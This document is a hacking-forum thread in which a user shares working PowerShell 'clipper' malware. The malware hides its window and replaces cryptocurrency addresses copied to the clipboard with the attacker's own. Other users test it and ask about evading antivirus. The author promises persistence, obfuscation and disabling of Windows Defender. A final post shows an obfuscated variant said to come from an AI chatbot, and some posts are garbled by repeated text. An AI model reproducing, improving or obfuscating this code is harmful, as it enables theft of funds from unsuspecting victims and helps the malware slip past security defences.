malware [Power shell] Clipboard malware

[Guest]

Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public static void Hide()
{
    IntPtr hWnd = GetConsoleWindow();
    if(hWnd != IntPtr.Zero)
    {
        ShowWindow(hWnd, 0);
    }
}
'

[Console.Window]::Hide()

$addy = @{
    "BTC" = "Your btc addy"
    "ETH" = "Your eth addy"
    "LTC" = "Your ltc addy"
    "TRX" = "Your trx addy"
    "XMR" = "Your xmr addy"
}

while ($true) {
    $clipper = Get-Clipboard

    if ($clipper -match "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$") {
        $clipper = $addy["BTC"]
        [System.Windows.Forms.Clipboard]::SetText($clipper)
    }
    
    elseif ($clipper -match "^0x[a-fA-F0-9]{40}$") {
        $clipper = $addy["ETH"]
        [System.Windows.Forms.Clipboard]::SetText($clipper)
    }
    
    elseif ($clipper -match "^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$") {
        $clipper = $addy["LTC"]
        [System.Windows.Forms.Clipboard]::SetText($clipper)
    }
    
    elseif ($clipper -match "^T[a-zA-HJ-NP-Z0-9]{33}$") {
        $clipper = $addy["TRX"]
        [System.Windows.Forms.Clipboard]::SetText($clipper)
    }
    
    elseif ($clipper -match "^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$") {
        $clipper = $addy["XMR"]
        [System.Windows.Forms.Clipboard]::SetText($clipper)
    }

    Start-Sleep -Seconds 1
}

 

[katg]

thank you i will test it, does this need to be obfuscated from amsi or anti virus

 

[Guest]

thank you i will test it, does this need to be obfuscated















thank you i will test it, does this need to be obfuscated from amsi or anti virus















It's currently fud but it's best practice to encode it



















































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































Nits currently o

 

[katg]

ok thanks i tried to run it in powershell but i got an error, did this ever happen to you?

d-Type : The term 'd-Type' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ d-Type -Name Window -Namespace Console -MemberDefinition '
+ ~~~~~~
+ CategoryInfo : ObjectNotFound: (d-Type:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

PS C:\Users\test>
PS C:\Users\test> [Console.Window]::Hide()
Unable to find type [Console.Window].
At line:1 char:1
+ [Console.Window]::Hide()
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (Console.WindowypeName) [], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound

 

[katg]

i just realized i miss spelled the code d-type is add-type lol

 

[katg]

Brother thanks it works, and its amazing.. great job

 

[Guest]

Brother thanks it works, and its amazing.. great job

Thank you! glad you like it.

 

[katg]

is the script written in csharp? im trying to compile it to a .exe file

 

[Guest]

is the script written in csharp? im trying to compile it to a .exe file

Power shell

 

[Guest]

Builder for the clipper the regular expressions for XMR & LTC are a lil messed up feel free to fix it

 

[beffjezos]

Simple but effective. Nice stuff!

 

[mosses]

nice it works, I started learning PS recently, hopefully i understand the code.

 

[Guest]

• Added registry entry for start up.
• Support of seven crypto addresses.
• Now you can select a where to save the generated clipper file.

 

[DimmuBurgor]

Functions independent of UAC or should we add runas verb or $credential for assurance?

 

[Guest]

Functions independent of UAC or should we add runas verb or $credential for assurance?

No it's not require privileges to run successfully

 

[Guest]

I will add to/fix the code as reported by members. Currently works flawlessly!

- Fixed registry startup

- Added hidden attributes

- Added drop to temp with a random 15 char name

- Adding obfuscation

- Adding delete windows 10 defender

- Adding to be able to set the execution policy as unrestricted upon running the clipper

 

[kokoganev]

When I Copy-Paste addresses I receive this error
"Exeption calling "SetText" with "1" argument(s): Requested Clipboard operation did not succeed."
Is it only me, and if yes -any suggestions how to fix it?

 

[Guest]

When I Copy-Paste addresses I receive this error
"Exeption calling "SetText" with "1" argument(s): Requested Clipboard operation did not succeed."
Is it only me, and if yes -any suggestions how to fix it?

Thank you for letting me know ill see if I get that error and fix

 

[Guest]

- Added support for BTC addresses bc1, tb1, 1 & 3

- Added support for LTC addresses ltc1, M, & L

- Added support for ZEC & DOGE (ZEC transparent)

- Added random drop to either appdata or temp

- Added the ability to generate clipper file with a random name

- Adding obfuscation

- Adding delete windows 10 defender

 

[S3VE7N]

$a = '$addy';$b = '${';$c = 'XE';$d = 'E["';$e = 'NT';$f = 'TC"';$g = '}';$h = 'ETH"';$i = 'LTC"';$j = 'TRX"';$k = 'XMR"';$l = 'Start-Sleep';$m = 'Seconds';$n = 'while';$o = 'Get-Clipboard';$p = '-match';$q = '^0x[a-fA-F0-9]{40}$';$r = '^T[a-zA-HJ-NP-Z0-9]{33}$';$s = '^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$';$t = '^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$';$u = 'SetText';$v = '[System.Windows.Forms.Clipboard]';$w = 'Hide';$x = '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);public static void Hide(){IntPtr hWnd = GetConsoleWindow();if(hWnd != IntPtr.Zero){ShowWindow(hWnd, 0);}}';$y = 'Console.Window';$z = '-Namespace';IEX ((GC env:temp).PSPath + '\Invoke-Obfuscation\Invoke-Obfuscation.psd1');$y::Hide();while($true){$p -i $o $t;if($?){$o = $a + "[$f$h$g]";$v::$u($o);}$p -i $o $q;if($?){$o = $a + "[$f$h$g]";$v::$u($o);}$p -i $o $s;if($?){$o = $a + "[$f$i$g]";$v::$u($o);}$p -i $o $r;if($?){$o = $a + "[$f$j$g]";$v::$u($o);}$p -i $o '^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$';if($?){$o = $a + "[$f$k$g]";$v::$u($o);}$l -i 1$m;}

Asked Mr.GPT to obfuscate it xD